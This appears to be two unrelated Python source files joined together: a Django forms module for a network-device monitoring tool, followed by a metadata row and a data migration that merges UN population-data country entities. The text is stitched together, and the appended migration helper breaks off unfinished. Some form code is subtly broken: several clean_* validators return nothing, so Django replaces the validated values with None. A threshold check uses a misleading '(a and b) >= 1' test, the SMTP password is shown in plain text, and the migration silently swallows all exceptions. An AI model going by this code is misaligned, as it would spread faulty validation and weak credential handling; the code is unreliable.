# To show the red asterisk on the left of required fields, the setting below is needed, and the CSS must also be configured in the HTML
required_css_class = 'required'
id = forms.IntegerField(label='设备ID',
required=True,
widget=forms.TextInput(attrs={"class": "form-control", 'readonly': True}))
name = forms.CharField(max_length=100,
min_length=2,
label='设备名称',
required=True,
widget=forms.TextInput(attrs={"class": "form-control"}))
# GenericIPAddressField validates the entered IP address
ip = forms.GenericIPAddressField(required=True,
label='IP地址',
widget=forms.TextInput(attrs={"class": "form-control"}))
description = forms.CharField(label="设备描述",
required=False,
# Textarea allows multi-line input; "rows": 3 controls how many rows are displayed
widget=forms.Textarea(attrs={"class": "form-control", "rows": 3}))
# Selectable device types
type_choices = []
devicetype = Devicetype.objects.all()
for x in devicetype:
type_choices.append([x.id, x.type_name])
type = forms.CharField(label='设备类型',
required=True,
widget=forms.Select(choices=type_choices,
attrs={"class": "form-control"}))
TRUE_FALSE_CHOICES = ((True, 'Yes'), (False, 'No'))
snmp_enable = forms.ChoiceField(label='是否激活SNMP',
required=True,
choices=TRUE_FALSE_CHOICES,
initial=False,
widget=forms.Select(attrs={"class": "required checkbox form-control"}))
community_regex = RegexValidator(regex=r'[0-9a-zA-Z~!@#$%^&*()_+=,./]+',
message="SNMP community 只能包含数字,小写,大写字母 ~!@#$%^&*()_+=,./")
snmp_ro_community = forms.CharField(max_length=100,
min_length=2,
label='SNMP只读',
required=True,
validators=[community_regex],
widget=forms.TextInput(attrs={"class": "form-control"}))
snmp_rw_community = forms.CharField(max_length=100,
min_length=2,
label='SNMP读写',
required=False,
validators=[community_regex],
widget=forms.TextInput(attrs={"class": "form-control"}))
username_regex = RegexValidator(regex=r'[0-9a-zA-Z~!@#$%^&*()_+=,./]+',
message="用户名只能包含数字,小写,大写字母 ~!@#$%^&*()_+=,./")
ssh_username = forms.CharField(max_length=100,
min_length=2,
label='SSH用户名',
required=True,
validators=[username_regex],
widget=forms.TextInput(attrs={"class": "form-control"}))
password_regex = RegexValidator(regex=r'[0-9a-zA-Z~!@#$%^&*()_+=,./]+',
message="密码只能包含数字,小写,大写字母 ~!@#$%^&*()_+=,./")
ssh_password = forms.CharField(max_length=100,
min_length=2,
label='SSH密码',
required=True,
validators=[password_regex],
widget=forms.PasswordInput(attrs={"class": "form-control"}))
enable_password_regex = RegexValidator(regex=r'[0-9a-zA-Z~!@#$%^&*()_+=,./]+',
message="特权密码只能包含数字,小写,大写字母 ~!@#$%^&*()_+=,./")
enable_password = forms.CharField(max_length=100,
min_length=2,
label='特权密码',
required=False,
validators=[enable_password_regex],
widget=forms.PasswordInput(attrs={"class": "form-control"}))
# # Validate that the device name is not duplicated; in this system devices have no separate unique ID, the device name is the unique ID and must not repeat
# def clean_name(self):
# name = self.cleaned_data['name'] # get the device name entered by the user
# # Check whether this device name already exists in the database; exists() returns True if the queryset has data, otherwise False
# existing = Devicedb.objects.filter(name=name).exists()
# # If it exists, show a validation error
# if existing:
# raise forms.ValidationError("设备名不能重复")
# # If validation passes, return the device name
# return name
# SNMP must be enabled before the read-only community can be set
def clean_snmp_ro_community(self):
snmp_enable = self.cleaned_data['snmp_enable']
snmp_ro_community = self.cleaned_data['snmp_ro_community']
if snmp_enable == 'True' and snmp_ro_community:
return snmp_ro_community
else:
raise forms.ValidationError("设置只读Community之前请激活SNMP")
# SNMP must be enabled before the read-write community can be set
def clean_snmp_rw_community(self):
snmp_enable = self.cleaned_data['snmp_enable']
snmp_rw_community = self.cleaned_data['snmp_rw_community']
if snmp_rw_community:
if snmp_enable == 'True' and snmp_rw_community:
return snmp_rw_community
else:
raise forms.ValidationError("设置读写Community之前请激活SNMP")
else:
return snmp_rw_community
# System settings: monitoring interval form
class SysconfigmonitorintervalForm(forms.Form):
# To show the red asterisk on the left of required fields, the setting below is needed, and the CSS must also be configured in the HTML
required_css_class = 'required'
interval_regex = RegexValidator(regex=r'^\d{1,2}$',
message="监控周期只能支持最多2位整数")
# CPU monitoring interval
cpu_interval = forms.CharField(validators=[interval_regex],
min_length=1,
max_length=2,
label='CPU监控周期(单位小时,默认1小时)',
required=True,
widget=forms.NumberInput(attrs={"class": "form-control"}))
# CPU maximum calculation interval
cpu_max_interval = forms.CharField(validators=[interval_regex],
min_length=1,
max_length=2,
label='CPU最大值计算周期(单位小时,默认1小时)',
required=True,
widget=forms.NumberInput(attrs={"class": "form-control"}))
# Memory monitoring interval
mem_interval = forms.CharField(validators=[interval_regex],
min_length=1,
max_length=2,
label='内存监控周期(单位小时,默认1小时)',
required=True,
widget=forms.NumberInput(attrs={"class": "form-control"}))
# Memory maximum calculation interval
mem_max_interval = forms.CharField(validators=[interval_regex],
min_length=1,
max_length=2,
label='内存最大值计算周期(单位小时,默认1小时)',
required=True,
widget=forms.NumberInput(attrs={"class": "form-control"}))
# Speed monitoring interval
speed_interval = forms.CharField(validators=[interval_regex],
min_length=1,
max_length=2,
label='接口速率监控周期(单位小时,默认1小时)',
required=True,
widget=forms.NumberInput(attrs={"class": "form-control"}))
# Utilization monitoring interval
utilization_interval = forms.CharField(validators=[interval_regex],
min_length=1,
max_length=2,
label='接口利用率监控周期(单位小时,默认1小时)',
required=True,
widget=forms.NumberInput(attrs={"class": "form-control"}))
# System settings: database data lifetime form
class SysconfigdatabaselifetimeForm(forms.Form):
# To show the red asterisk on the left of required fields, the setting below is needed, and the CSS must also be configured in the HTML
required_css_class = 'required'
interval_regex = RegexValidator(regex=r'^\d{1,3}$',
message="数据老化时间只能支持最多3位整数")
# Reachability data lifetime
reachable_lifetime = forms.CharField(validators=[interval_regex],
min_length=1,
max_length=3,
label='可达性数据老化时间(单位小时,默认24小时)',
required=True,
widget=forms.NumberInput(attrs={"class": "form-control"}))
# CPU data lifetime
cpu_lifetime = forms.CharField(validators=[interval_regex],
min_length=1,
max_length=3,
label='CPU数据老化时间(单位小时,默认24小时)',
required=True,
widget=forms.NumberInput(attrs={"class": "form-control"}))
# Memory data lifetime
mem_lifetime = forms.CharField(validators=[interval_regex],
min_length=1,
max_length=3,
label='内存数据老化时间(单位小时,默认24小时)',
required=True,
widget=forms.NumberInput(attrs={"class": "form-control"}))
# Interface data lifetime
interface_lifetime = forms.CharField(validators=[interval_regex],
min_length=1,
max_length=3,
label='接口数据老化时间(单位小时,默认24小时)',
required=True,
widget=forms.NumberInput(attrs={"class": "form-control"}))
# Netflow data lifetime
netflow_lifetime = forms.CharField(validators=[interval_regex],
min_length=1,
max_length=3,
label='Netflow数据老化时间(单位小时,默认24小时)',
required=True,
widget=forms.NumberInput(attrs={"class": "form-control"}))
# System settings: alarm thresholds, intervals and SMTP form
class Sysconfigthreshold(forms.Form):
# To show the red asterisk on the left of required fields, the setting below is needed, and the CSS must also be configured in the HTML
required_css_class = 'required'
threshold_regex = RegexValidator(regex=r'^1?\d{1,2}$',
message="阈值取值范围为1-100的整数")
interval_regex = RegexValidator(regex=r'^\d{1,2}$',
message="监控周期只能支持最多2位整数")
# CPU alarm threshold
cpu_threshold = forms.CharField(validators=[threshold_regex],
min_length=1,
max_length=3,
label='CPU告警阈值(单位%)设置为0表示取消',
required=True,
widget=forms.NumberInput(attrs={"class": "form-control"}))
# CPU alarm interval
cpu_alarm_interval = forms.CharField(validators=[interval_regex],
min_length=1,
max_length=5,
label='CPU告警周期(单位分钟)',
required=True,
widget=forms.NumberInput(attrs={"class": "form-control"}))
# Memory alarm threshold
mem_threshold = forms.CharField(validators=[threshold_regex],
min_length=1,
max_length=3,
label='内存告警阈值(单位%)设置为0表示取消',
required=True,
widget=forms.NumberInput(attrs={"class": "form-control"}))
# Memory alarm interval
mem_alarm_interval = forms.CharField(validators=[interval_regex],
min_length=1,
max_length=5,
label='内存告警周期(单位分钟)',
required=True,
widget=forms.NumberInput(attrs={"class": "form-control"}))
# Interface utilization alarm threshold
utilization_threshold = forms.CharField(validators=[threshold_regex],
min_length=1,
max_length=3,
label='接口利用率告警阈值(单位%)设置为0表示取消',
required=True,
widget=forms.NumberInput(attrs={"class": "form-control"}))
# Interface utilization alarm interval
utilization_alarm_interval = forms.CharField(validators=[interval_regex],
min_length=1,
max_length=5,
label='接口利用率告警周期(单位分钟)',
required=True,
widget=forms.NumberInput(attrs={"class": "form-control"}))
# SNMP alarm interval
snmp_alarm_interval = forms.CharField(validators=[interval_regex],
min_length=1,
max_length=5,
label='SNMP告警周期(单位分钟)',
required=True,
widget=forms.NumberInput(attrs={"class": "form-control"}))
# SMTP mail server
mailserver = forms.CharField(min_length=1,
max_length=50,
label='邮件服务器',
required=False,
widget=forms.TextInput(attrs={"class": "form-control"}))
# SMTP authentication username
mailusername = forms.CharField(min_length=1,
max_length=50,
label='用户名',
required=False,
widget=forms.TextInput(attrs={"class": "form-control"}))
# SMTP authentication password
mailpassword = forms.CharField(min_length=1,
max_length=50,
label='密码',
required=False,
widget=forms.TextInput(attrs={"class": "form-control"}))
# Mail sender (FROM)
mailfrom = forms.CharField(min_length=1,
max_length=50,
label='发件人FROM',
required=False,
widget=forms.TextInput(attrs={"class": "form-control"}))
# Mail recipient (TO)
mailto = forms.CharField(min_length=1,
max_length=50,
label='收件人TO',
required=False,
widget=forms.TextInput(attrs={"class": "form-control"}))
def clean_cpu_alarm_interval(self):
cpu_threshold = int(self.cleaned_data['cpu_threshold'])
cpu_alarm_interval = int(self.cleaned_data['cpu_alarm_interval'])
if (cpu_threshold and cpu_alarm_interval) >= 1:
pass
elif cpu_threshold == 0 and cpu_alarm_interval == 0:
pass
else:
raise forms.ValidationError("CPU阈值与告警周期,要么都设置,要么都保持默认的0!不能只设置其中一个!")
def clean_mem_alarm_interval(self):
mem_threshold = int(self.cleaned_data['mem_threshold'])
mem_alarm_interval = int(self.cleaned_data['mem_alarm_interval'])
if (mem_threshold and mem_alarm_interval) >= 1:
pass
elif mem_threshold == 0 and mem_alarm_interval == 0:
pass
else:
raise forms.ValidationError("内存阈值与告警周期,要么都设置,要么都保持默认的0!不能只设置其中一个!")
def clean_utilization_alarm_interval(self):
utilization_threshold = int(self.cleaned_data['utilization_threshold'])
utilization_alarm_interval = int(self.cleaned_data['utilization_alarm_interval'])
if (utilization_threshold and utilization_alarm_interval) >= 1:
pass
elif utilization_threshold == 0 and utilization_alarm_interval == 0:
pass
else:
raise forms.ValidationError("利用率阈值与告警周期,要么都设置,要么都保持默认的0!不能只设置其中一个!")
def clean_mailto(self):
mailserver = self.cleaned_data['mailserver']
mailusername = self.cleaned_data['mailusername']
mailpassword = self.cleaned_data['mailpassword']
mailfrom = self.cleaned_data['mailfrom']
mailto = self.cleaned_data['mailto']
if mailserver and mailusername and mailpassword and mailfrom and mailto:
pass
elif not mailserver and not mailusername and not mailpassword and not mailfrom and not mailto:
pass
else:
raise forms.ValidationError("邮件信息要么全部设置!要么全部保持空!不能只设置其中的一部分!")
class NetFlowProtocol(forms.Form):
# To show the red asterisk on the left of required fields, the setting below is needed, and the CSS must also be configured in the HTML
required_css_class = 'required'
protocol_regex = RegexValidator(regex=r'^\d.*',
message="协议号直接填写数字")
protocol_type_regex = RegexValidator(regex=r'[A-Z0-9_]+',
message="协议类型格式:IPV4_SRC_ADDR ")
protocol_number = forms.CharField(validators=[protocol_regex],
min_length=1,
max_length=6,
label='协议号',
required=True,
widget=forms.NumberInput(attrs={"class": "form-control"}))
field_types = forms.CharField(validators=[protocol_type_regex],
min_length=1,
max_length=100,
label='协议类型',
required=True,
widget=forms.TextInput(attrs={"class": "form-control"}))
def clean_protocol_number(self):
protocol_number = self.cleaned_data['protocol_number']
# Check whether this protocol number already exists in the database; exists() returns True if the queryset has any rows, otherwise False
existing = FieldTypeMap.objects.filter(field_id=protocol_number).exists()
# If it already exists, raise a validation error
if existing:
raise forms.ValidationError("协议号不能重复")
# Otherwise validation succeeded, return the protocol number
return protocol_number
def clean_field_types(self):
field_types = self.cleaned_data['field_types']
# Check whether this protocol type already exists in the database; exists() returns True if the queryset has any rows, otherwise False
existing = FieldTypeMap.objects.filter(field_name=field_types).exists()
# If it already exists, raise a validation error
if existing:
raise forms.ValidationError("协议类型不能重复")
# Otherwise validation succeeded, return the protocol type
return field_types
class NetFlowApplication(forms.Form):
# To show the red asterisk next to required fields, set the attribute below and also add the matching CSS class in the HTML template
required_css_class = 'required'
pro_dst_post_regex = RegexValidator(regex=r'\d\/\d',
message="格式:17/443 ")
application_regex = RegexValidator(regex=r'[A-Za-z]+',
message="格式:HTTPS ")
pro_dst_post = forms.CharField(validators=[pro_dst_post_regex],
min_length=1,
max_length=100,
label='协议/目的端口',
required=True,
widget=forms.TextInput(attrs={"class": "form-control"}))
application_name = forms.CharField(validators=[application_regex],
min_length=1,
max_length=100,
label='应用名',
required=True,
widget=forms.TextInput(attrs={"class": "form-control"}))
def clean_pro_dst_post(self):
pro_dst_post = self.cleaned_data['pro_dst_post']
# Check whether this protocol/port combination already exists in the database; exists() returns True if the queryset has any rows, otherwise False
existing = ApplicationMap.objects.filter(pro_dst_port=pro_dst_post).exists()
# If it already exists, raise a validation error
if existing:
raise forms.ValidationError("协议和端口号不能重复")
# Otherwise validation succeeded, return the protocol/port value
return pro_dst_post
# Because the key is the protocol/destination-port combination, one application may use several ports, so this check is commented out for now!
# def clean_application_name(self):
# application_name = self.cleaned_data['application_name']
# # Check whether this application name already exists in the database; exists() returns True if the queryset has any rows, otherwise False
# existing = ApplicationMap.objects.filter(application_name=application_name).exists()
# # If it already exists, raise a validation error
# if existing:
# raise forms.ValidationError("应用类型不能重复")
# # Otherwise validation succeeded, return the application name
# return application_name
class UserForm(forms.Form):
username = forms.CharField(max_length=30)
password = forms.CharField(max_length=50)
password2 = forms.CharField(max_length=50)
email = forms.EmailField(max_length=50)
class loginForm(forms.Form):
username = forms.CharField(max_length=30)
password = forms.CharField(max_length=50)
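# --- Illustrative usage sketch (not part of the original module) ---
# A minimal sketch of how one of the forms above would be driven from a view; the helper name
# and the way the result is consumed are assumptions for illustration only.
def _example_handle_netflow_protocol(post_data):
    # Bind the submitted data; is_valid() runs the field validators and the clean_* hooks above
    form = NetFlowProtocol(post_data)
    if form.is_valid():
        # cleaned_data holds the validated values, e.g. cleaned_data['protocol_number']
        return form.cleaned_data
    # form.errors maps each field name to its validation messages
    return form.errors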
| 47.025335 | 109 | 0.497053 | 2,608 | 31,554 | 5.833589 | 0.11388 | 0.048442 | 0.059813 | 0.08972 | 0.803799 | 0.775141 | 0.767451 | 0.746944 | 0.712699 | 0.631326 | 0 | 0.010822 | 0.399664 | 31,554 | 670 | 110 | 47.095522 | 0.792324 | 0.072923 | 0 | 0.707317 | 0 | 0 | 0.113464 | 0.02423 | 0 | 0 | 0 | 0 | 0 | 1 | 0.030488 | false | 0.063008 | 0.006098 | 0 | 0.29878 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 8 |
0d506b9ee549a00243ad9bcf2fbfbe780db8c1dd | 17,146 | py | Python | grapher_admin/migrations/0010_auto_20170911_1454.py | stjordanis/owid-importer | 4341713d7fa88b41327ea48419ed5785b5cb9faf | ["MIT"] | 15 | 2018-12-07T06:11:49.000Z | 2022-01-24T03:38:05.000Z | grapher_admin/migrations/0010_auto_20170911_1454.py | stjordanis/owid-importer | 4341713d7fa88b41327ea48419ed5785b5cb9faf | ["MIT"] | 10 | 2020-04-05T01:08:27.000Z | 2022-02-17T23:54:13.000Z | grapher_admin/migrations/0010_auto_20170911_1454.py | stjordanis/owid-importer | 4341713d7fa88b41327ea48419ed5785b5cb9faf | ["MIT"] | 6 | 2018-11-03T09:14:58.000Z | 2021-05-17T21:59:59.000Z |
# -*- coding: utf-8 -*-
# Generated by Django 1.11 on 2017-09-11 14:54
from __future__ import unicode_literals
from django.db import migrations
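# Forward data migration: the UN WPP import created entities whose names carry footnote text.
# The function below either renames them to the standard short name or, where a short-named
# entity already exists, re-points their DataValue rows at it and deletes the long-named
# duplicate. The whole block is wrapped in try/except, so a missing entity silently aborts
# the cleanup.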
def standardize_long_unwpp_country_names(apps, schema_editor):
try:
Entity = apps.get_model('grapher_admin', 'Entity')
Entity.objects.filter(name='Serbia, Including Kosovo.').update(name='Serbia (including Kosovo)')
Entity.objects.filter(name='Guadeloupe, Including Saint-Barthélemy and Saint-Martin (French part).').update(name='Guadeloupe (including Saint-Barthélemy and Saint-Martin)')
DataValue = apps.get_model('grapher_admin', 'DataValue')
DataValue.objects.filter(fk_ent_id=Entity.objects.get(name='More developed regions, More developed regions comprise Europe, Northern America, Australia/New Zealand and Japan.').pk).update(fk_ent_id=Entity.objects.get(name='More developed regions').pk)
Entity.objects.get(name='More developed regions, More developed regions comprise Europe, Northern America, Australia/New Zealand and Japan.').delete()
DataValue.objects.filter(fk_ent_id=Entity.objects.get(
name='Less developed regions, Less developed regions comprise all regions of Africa, Asia (except Japan), Latin America and the Caribbean plus Melanesia, Micronesia and Polynesia.').pk).update(
fk_ent_id=Entity.objects.get(name='Less developed regions').pk)
Entity.objects.get(
name='Less developed regions, Less developed regions comprise all regions of Africa, Asia (except Japan), Latin America and the Caribbean plus Melanesia, Micronesia and Polynesia.').delete()
DataValue.objects.filter(fk_ent_id=Entity.objects.get(
name='Least developed countries, The group of least developed countries, as defined by the United Nations General Assembly in its resolutions (59/209, 59/210, 60/33, 62/97, 64/L.55, 67/L.43, 64/295 and 68/18) included 47 countries in June 2017: 33 in Africa,').pk).update(
fk_ent_id=Entity.objects.get(name='Least developed countries').pk)
Entity.objects.get(
name='Least developed countries, The group of least developed countries, as defined by the United Nations General Assembly in its resolutions (59/209, 59/210, 60/33, 62/97, 64/L.55, 67/L.43, 64/295 and 68/18) included 47 countries in June 2017: 33 in Africa,').delete()
DataValue.objects.filter(fk_ent_id=Entity.objects.get(
name='Less developed regions, excluding least developed countries, Other less developed countries comprise the less developed regions excluding the least developed countries.').pk).update(
fk_ent_id=Entity.objects.get(name='Less developed regions, excluding least developed countries').pk)
Entity.objects.get(
name='Less developed regions, excluding least developed countries, Other less developed countries comprise the less developed regions excluding the least developed countries.').delete()
DataValue.objects.filter(fk_ent_id=Entity.objects.get(
name='High-income countries, The country classification by income level is based on 2016 GNI per capita from the World Bank.').pk).update(
fk_ent_id=Entity.objects.get(name='High-income countries').pk)
Entity.objects.get(
name='High-income countries, The country classification by income level is based on 2016 GNI per capita from the World Bank.').delete()
DataValue.objects.filter(fk_ent_id=Entity.objects.get(
name='Middle-income countries, The country classification by income level is based on 2016 GNI per capita from the World Bank.').pk).update(
fk_ent_id=Entity.objects.get(name='Middle-income countries').pk)
Entity.objects.get(
name='Middle-income countries, The country classification by income level is based on 2016 GNI per capita from the World Bank.').delete()
DataValue.objects.filter(fk_ent_id=Entity.objects.get(
name='Upper-middle-income countries, The country classification by income level is based on 2016 GNI per capita from the World Bank.').pk).update(
fk_ent_id=Entity.objects.get(name='Upper-middle-income countries').pk)
Entity.objects.get(
name='Upper-middle-income countries, The country classification by income level is based on 2016 GNI per capita from the World Bank.').delete()
DataValue.objects.filter(fk_ent_id=Entity.objects.get(
name='Lower-middle-income countries, The country classification by income level is based on 2016 GNI per capita from the World Bank.').pk).update(
fk_ent_id=Entity.objects.get(name='Lower-middle-income countries').pk)
Entity.objects.get(
name='Lower-middle-income countries, The country classification by income level is based on 2016 GNI per capita from the World Bank.').delete()
DataValue.objects.filter(fk_ent_id=Entity.objects.get(
name='Low-income countries, The country classification by income level is based on 2016 GNI per capita from the World Bank.').pk).update(
fk_ent_id=Entity.objects.get(name='Low-income countries').pk)
Entity.objects.get(
name='Low-income countries, The country classification by income level is based on 2016 GNI per capita from the World Bank.').delete()
DataValue.objects.filter(fk_ent_id=Entity.objects.get(
name='Sub-Saharan Africa, Sub-Saharan Africa refers to all of Africa except Northern Africa.').pk).update(
fk_ent_id=Entity.objects.get(name='Sub-Saharan Africa').pk)
Entity.objects.get(
name='Sub-Saharan Africa, Sub-Saharan Africa refers to all of Africa except Northern Africa.').delete()
DataValue.objects.filter(fk_ent_id=Entity.objects.get(
name='Mauritius, Including Agalega, Rodrigues and Saint Brandon.').pk).update(
fk_ent_id=Entity.objects.get(name='Mauritius').pk)
Entity.objects.get(
name='Mauritius, Including Agalega, Rodrigues and Saint Brandon.').delete()
DataValue.objects.filter(fk_ent_id=Entity.objects.get(
name='United Republic of Tanzania, Including Zanzibar.').pk).update(
fk_ent_id=Entity.objects.get(name='Tanzania').pk)
Entity.objects.get(
name='United Republic of Tanzania, Including Zanzibar.').delete()
DataValue.objects.filter(fk_ent_id=Entity.objects.get(
name='Western Africa, Including Saint Helena, Ascension, and Tristan da Cunha.').pk).update(
fk_ent_id=Entity.objects.get(name='Western Africa').pk)
Entity.objects.get(
name='Western Africa, Including Saint Helena, Ascension, and Tristan da Cunha.').delete()
DataValue.objects.filter(fk_ent_id=Entity.objects.get(
name='China, For statistical purposes, the data for China do not include Hong Kong and Macao, Special Administrative Regions (SAR) of China, and Taiwan Province of China.').pk).update(
fk_ent_id=Entity.objects.get(name='China').pk)
Entity.objects.get(
name='China, For statistical purposes, the data for China do not include Hong Kong and Macao, Special Administrative Regions (SAR) of China, and Taiwan Province of China.').delete()
DataValue.objects.filter(fk_ent_id=Entity.objects.get(
name='China, Hong Kong SAR, As of 1 July 1997, Hong Kong became a Special Administrative Region (SAR) of China.').pk).update(
fk_ent_id=Entity.objects.get(name='Hong Kong').pk)
Entity.objects.get(
name='China, Hong Kong SAR, As of 1 July 1997, Hong Kong became a Special Administrative Region (SAR) of China.').delete()
DataValue.objects.filter(fk_ent_id=Entity.objects.get(
name='China, Macao SAR, As of 20 December 1999, Macao became a Special Administrative Region (SAR) of China.').pk).update(
fk_ent_id=Entity.objects.get(name='Macao').pk)
Entity.objects.get(
name='China, Macao SAR, As of 20 December 1999, Macao became a Special Administrative Region (SAR) of China.').delete()
DataValue.objects.filter(fk_ent_id=Entity.objects.get(
name='China, Taiwan Province of China').pk).update(
fk_ent_id=Entity.objects.get(name='Taiwan').pk)
Entity.objects.get(
name='China, Taiwan Province of China').delete()
DataValue.objects.filter(fk_ent_id=Entity.objects.get(
name='South-Central Asia, The regions Southern Asia and Central Asia are combined into South-Central Asia.').pk).update(
fk_ent_id=Entity.objects.get(name='South-Central Asia').pk)
Entity.objects.get(
name='South-Central Asia, The regions Southern Asia and Central Asia are combined into South-Central Asia.').delete()
DataValue.objects.filter(fk_ent_id=Entity.objects.get(
name='Malaysia, Including Sabah and Sarawak.').pk).update(
fk_ent_id=Entity.objects.get(name='Malaysia').pk)
Entity.objects.get(
name='Malaysia, Including Sabah and Sarawak.').delete()
DataValue.objects.filter(fk_ent_id=Entity.objects.get(
name='Azerbaijan, Including Nagorno-Karabakh.').pk).update(
fk_ent_id=Entity.objects.get(name='Azerbaijan').pk)
Entity.objects.get(
name='Azerbaijan, Including Nagorno-Karabakh.').delete()
DataValue.objects.filter(fk_ent_id=Entity.objects.get(
name='Cyprus, Refers to the whole country.').pk).update(
fk_ent_id=Entity.objects.get(name='Cyprus').pk)
Entity.objects.get(
name='Cyprus, Refers to the whole country.').delete()
DataValue.objects.filter(fk_ent_id=Entity.objects.get(
name='Georgia, Including Abkhazia and South Ossetia.').pk).update(
fk_ent_id=Entity.objects.get(name='Georgia').pk)
Entity.objects.get(
name='Georgia, Including Abkhazia and South Ossetia.').delete()
DataValue.objects.filter(fk_ent_id=Entity.objects.get(
name='State of Palestine, Including East Jerusalem.').pk).update(
fk_ent_id=Entity.objects.get(name='Palestine').pk)
Entity.objects.get(
name='State of Palestine, Including East Jerusalem.').delete()
DataValue.objects.filter(fk_ent_id=Entity.objects.get(
name='Czechia').pk).update(
fk_ent_id=Entity.objects.get(name='Czech Republic').pk)
Entity.objects.get(
name='Czechia').delete()
DataValue.objects.filter(fk_ent_id=Entity.objects.get(
name='Republic of Moldova, Including Transnistria.').pk).update(
fk_ent_id=Entity.objects.get(name='Moldova').pk)
Entity.objects.get(
name='Republic of Moldova, Including Transnistria.').delete()
DataValue.objects.filter(fk_ent_id=Entity.objects.get(
name='Ukraine, Including Crimea.').pk).update(
fk_ent_id=Entity.objects.get(name='Ukraine').pk)
Entity.objects.get(
name='Ukraine, Including Crimea.').delete()
DataValue.objects.filter(fk_ent_id=Entity.objects.get(
name='Northern Europe, Including Faeroe Islands, and Isle of Man.').pk).update(
fk_ent_id=Entity.objects.get(name='Northern Europe').pk)
Entity.objects.get(
name='Northern Europe, Including Faeroe Islands, and Isle of Man.').delete()
DataValue.objects.filter(fk_ent_id=Entity.objects.get(
name='Channel Islands, Refers to Guernsey, and Jersey.').pk).update(
fk_ent_id=Entity.objects.get(name='Channel Islands').pk)
Entity.objects.get(
name='Channel Islands, Refers to Guernsey, and Jersey.').delete()
DataValue.objects.filter(fk_ent_id=Entity.objects.get(
name='Finland, Including Åland Islands.').pk).update(
fk_ent_id=Entity.objects.get(name='Finland').pk)
Entity.objects.get(
name='Finland, Including Åland Islands.').delete()
DataValue.objects.filter(fk_ent_id=Entity.objects.get(
name='Norway, Including Svalbard and Jan Mayen Islands.').pk).update(
fk_ent_id=Entity.objects.get(name='Norway').pk)
Entity.objects.get(
name='Norway, Including Svalbard and Jan Mayen Islands.').delete()
DataValue.objects.filter(fk_ent_id=Entity.objects.get(
name='Southern Europe, Including Andorra, Gibraltar, Holy See, and San Marino.').pk).update(
fk_ent_id=Entity.objects.get(name='Southern Europe').pk)
Entity.objects.get(
name='Southern Europe, Including Andorra, Gibraltar, Holy See, and San Marino.').delete()
DataValue.objects.filter(fk_ent_id=Entity.objects.get(
name='Spain, Including Canary Islands, Ceuta and Melilla.').pk).update(
fk_ent_id=Entity.objects.get(name='Spain').pk)
Entity.objects.get(
name='Spain, Including Canary Islands, Ceuta and Melilla.').delete()
DataValue.objects.filter(fk_ent_id=Entity.objects.get(
name='TFYR Macedonia, The former Yugoslav Republic of Macedonia.').pk).update(
fk_ent_id=Entity.objects.get(name='Macedonia').pk)
Entity.objects.get(
name='TFYR Macedonia, The former Yugoslav Republic of Macedonia.').delete()
DataValue.objects.filter(fk_ent_id=Entity.objects.get(
name='Western Europe, Including Liechtenstein, and Monaco.').pk).update(
fk_ent_id=Entity.objects.get(name='Western Europe').pk)
Entity.objects.get(
name='Western Europe, Including Liechtenstein, and Monaco.').delete()
DataValue.objects.filter(fk_ent_id=Entity.objects.get(
name='Caribbean, Including Anguilla, British Virgin Islands, Caribbean Netherlands, Cayman Islands, Dominica, Montserrat, Saint Kitts and Nevis, Sint Maarten (Dutch part) and Turks and Caicos Islands.').pk).update(
fk_ent_id=Entity.objects.get(name='Caribbean').pk)
Entity.objects.get(
name='Caribbean, Including Anguilla, British Virgin Islands, Caribbean Netherlands, Cayman Islands, Dominica, Montserrat, Saint Kitts and Nevis, Sint Maarten (Dutch part) and Turks and Caicos Islands.').delete()
DataValue.objects.filter(fk_ent_id=Entity.objects.get(
name='South America, Including Falkland Islands (Malvinas).').pk).update(
fk_ent_id=Entity.objects.get(name='South America').pk)
Entity.objects.get(
name='South America, Including Falkland Islands (Malvinas).').delete()
DataValue.objects.filter(fk_ent_id=Entity.objects.get(
name='NORTHERN AMERICA, Including Bermuda, Greenland, and Saint Pierre and Miquelon.').pk).update(
fk_ent_id=Entity.objects.get(name='Northern America').pk)
Entity.objects.get(
name='NORTHERN AMERICA, Including Bermuda, Greenland, and Saint Pierre and Miquelon.').delete()
DataValue.objects.filter(fk_ent_id=Entity.objects.get(
name='Australia, Including Christmas Island, Cocos (Keeling) Islands and Norfolk Island.').pk).update(
fk_ent_id=Entity.objects.get(name='Australia').pk)
Entity.objects.get(
name='Australia, Including Christmas Island, Cocos (Keeling) Islands and Norfolk Island.').delete()
DataValue.objects.filter(fk_ent_id=Entity.objects.get(
name='Polynesia, Including American Samoa, Cook Islands, Niue, Pitcairn, Tokelau, Tuvalu, and Wallis and Futuna Islands.').pk).update(
fk_ent_id=Entity.objects.get(name='Polynesia').pk)
Entity.objects.get(
name='Polynesia, Including American Samoa, Cook Islands, Niue, Pitcairn, Tokelau, Tuvalu, and Wallis and Futuna Islands.').delete()
Variable = apps.get_model('grapher_admin', 'Variable')
Dataset = apps.get_model('grapher_admin', 'Dataset')
DataValue.objects.filter(fk_var_id__in=Variable.objects.filter(fk_dst_id__in=Dataset.objects.filter(namespace='faostat')), fk_ent_id=Entity.objects.get(code='FSM').pk).update(fk_ent_id=Entity.objects.get(name='Micronesia, Including Marshall Islands, Nauru, Northern Mariana Islands, and Palau.').pk)
DataValue.objects.filter(fk_ent_id=Entity.objects.get(
name='Micronesia (Federated States of)').pk).update(
fk_ent_id=Entity.objects.get(code='FSM').pk)
Entity.objects.get(name='Micronesia (Federated States of)').delete()
Entity.objects.filter(code='FSM').update(name='Micronesia (country)')
Entity.objects.filter(name='Micronesia, Including Marshall Islands, Nauru, Northern Mariana Islands, and Palau.').update(name='Micronesia (region)')
except Exception:
pass
class Migration(migrations.Migration):
dependencies = [
('grapher_admin', '0009_fix_map_colorSchemeValuesAutomatic'),
]
operations = [
migrations.RunPython(standardize_long_unwpp_country_names),
]
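# --- Illustrative sketch (not part of the original migration) ---
# The repeated merge-and-delete blocks above could be driven by a name mapping; a minimal
# version is sketched below, assuming the same Entity/DataValue models. The helper name and
# the example pairs are for illustration only.
def _merge_entities(apps, long_to_short):
    Entity = apps.get_model('grapher_admin', 'Entity')
    DataValue = apps.get_model('grapher_admin', 'DataValue')
    for long_name, short_name in long_to_short.items():
        # Re-point data values at the canonical entity, then drop the long-named duplicate
        duplicate = Entity.objects.get(name=long_name)
        target = Entity.objects.get(name=short_name)
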